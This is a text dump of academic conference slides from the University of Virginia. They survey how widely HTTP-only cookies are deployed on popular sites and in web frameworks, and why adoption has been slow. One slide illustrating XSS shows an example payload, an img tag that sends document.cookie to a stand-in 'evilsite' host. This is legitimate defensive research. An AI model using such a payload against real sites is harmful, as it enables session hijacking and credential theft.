why aren’t http-only cookies more widely deployed?
DESCRIPTION
Why aren’t HTTP-only cookies more widely deployed?. Department of Computer Science University of Virginia. Yuchen Zhou David Evans. HTTP-only Cookies. HTTP-only field prevents cookies from being read via document.cookie. Cookie: Name = value; Domain = value; Expiration time = value; - PowerPoint PPT PresentationTRANSCRIPT
Why aren’t HTTP-only cookies more widely deployed?
Yuchen ZhouDavid Evans
Department of Computer ScienceUniversity of Virginia
Modify DOM
Disclose user’s confidential
Install trojan
HTTP-only Cookies
Document.cookie
Evil JS
Send back
User credentials
<img src = http://evilsite/stealyourcookie.cgi?value=document.cookie>
HTTP-only field prevents cookies from being read via document.cookie.
Cookie:Name = value;Domain = value;Expiration time = value;Path = value;Secure
Cookie:Name = value;Domain = value;Expiration time = value;Path = value;Secure;Httponly
Inject
Lots of major sites still don’t use HTTP-only cookie
HTTP-only Deployment Timeline
Ruby on Rails sets HTTP-only on by default
2002 2003 2004 2005 2006 2007 2008 2009 2010IE6 introduces HTTP-only
Firefox extension supports HTTP-only
Firefox 2.0.0.5 supports HTTP-only.
Django developers consider supporting HTTP-only, but compatibility concerns held them back.
Ruby on Rails supports HTTP-only
TRACE method is still on by default on Apache servers and major websites [10]
w3.org specifies that browsers should disallow TRACE XMLHTTPRequests
IETF standard draft includes HTTP-only
Still no official Django support for HTTP-only
Serv
er-s
ide
Even
ts
US-CERT vulnerability note on XST attacks
Apache.org compromised by cookie stealing XSS attacks
Python supports HTTP-only. Django unofficial patch available.
IE8 fixes XMLHTTPResponse exploit
TRACE method disabled by all major browsers
Clie
nt/O
ther
Ev
ents
Lots of major sites still don’t use HTTP-only cookie
Apache.org compromised by cookie stealing XSS attacks
Methodology• 50 sites collected from Alexa.com world top 100 popular sites.
• Manually registered accounts and collected post-login cookie properties of all sites.
Httponly?
Survey Results
No HTTP-only au-thentication cook-
ies, 26
Use HTTP-only authentication
cookies, 24
No HTTP-only au-thentication cook-
ies, 26Before login,
11
After login, 13
Kapil Singh et al (2010 Oakland) also gave similar results on the deployment of HTTP-only cookies:
HTTP-only: 30/100 16.2% on 100,000
Frameworks Version Date HTTP-only Support
HTTP-only Default
1.1.1 July 2009 No
Authkit 0.4.4 July 2009 NoRepoze.who 1.0.10 2009 No
2.3.2 Mar 2009 Yes Yes2.2.2 Nov 2008 Yes No2.1.2 Oct 2008 No4.0 Feb 2010 Yes Yes
1.4 Feb 2010 Yes No
3.0 Feb 2010 No No
Survey Results on Web Frameworks
Why Aren’t HTTP-only Cookies More Widely Deployed?
Does DOM need to read cookies?
– Only 1 site out of 50 showed a minor malfunction on their web IM gadget. (renren.com)
Page Functionality
Httponly;
Can We Circumvent HTTP-only?
Send back
Document.cookieHTTPONLY
Inject
Cross-Site TracingXMLHTTPRequest
var cookie
Evil JS
Can We Circumvent HTTP-only?• Cross-site tracing • AJAX based attack
Use HTTP-only
None-HTTP
-only05
1015202530
22 20
2 6
Enable TraceDisable Trace
Use HTTP-only
None-HTT
P-only05
1015202530
24 21
0 5
InsecureSecure
Protection Effectiveness
Key l
ogge
rNetwork package sniffer
Hard drive
CSRF
CSRF
• Python doesn’t support HTTP-only until 2.6
• Django is based on python, so the deployment progress is stalled.
Software Stack Compatibility“Hmm, we probably can't use a patch that requires a patched python. Any different
solution?”
Django Developers
Standards Compliance
• Cookie specification has never been updated since HTTP-only was introduced.
• Without the specs, the developers are hesitating to make the change.
“Also, could you point me to where the RFC is talking about 'httponly'? I couldn't find it
at all.”
Django Developers
Ruby on Rails sets HTTP-only on by default
2002 2003 2004 2005 2006 2007 2008 2009 2010IE6 introduces HTTP-only
Firefox extension supports HTTP-only
Firefox 2.0.0.5 supports HTTP-only.
Django developers consider supporting HTTP-only, but compatibility concerns held them back.
Ruby on Rails supports HTTP-only
TRACE method is still on by default on Apache servers and major websites [10]
w3.org specifies that browsers should disallow TRACE XMLHTTPRequests
IETF standard draft includes HTTP-only
Still no official Django support for HTTP-only
Serv
er-s
ide
Even
ts
US-CERT vulnerability note on XST attacks
Apache.org compromised by cookie stealing XSS attacks
Python supports HTTP-only. Django unofficial patch available.
IE8 fixes XMLHTTPResponse exploit
TRACE method disabled by all major browsers
Clie
nt/O
ther
Ev
ents
Lots of major sites still don’t use HTTP-only cookie
Difficulty in Deploying in Both Ends
• Similar deployment issues:– Set-cookie2 header in RFC2965– Updating TCP protocol
Difficulty in Deploying in Both Ends
• Add HTTP-only field to cookies • Interpret HTTP-only field correctly
• Disable Trace and implementSet-cookie securely
• Implement HTTP-only defense correctly
Lessons Learned
①Maintain backward compatibility
②Be aggressive on client side.
③Opt-in? Opt-out!
Httponly = trueHttponly
+ H tt p o n l y
Questions?
Thank you!
Backup Slides
• Kapil Singh et al (2010 Oakland) also proved similar results on the deployment of HTTP-only cookies:
Survey Results
Survey Results on More Sites
Page Functionality
Google analytics?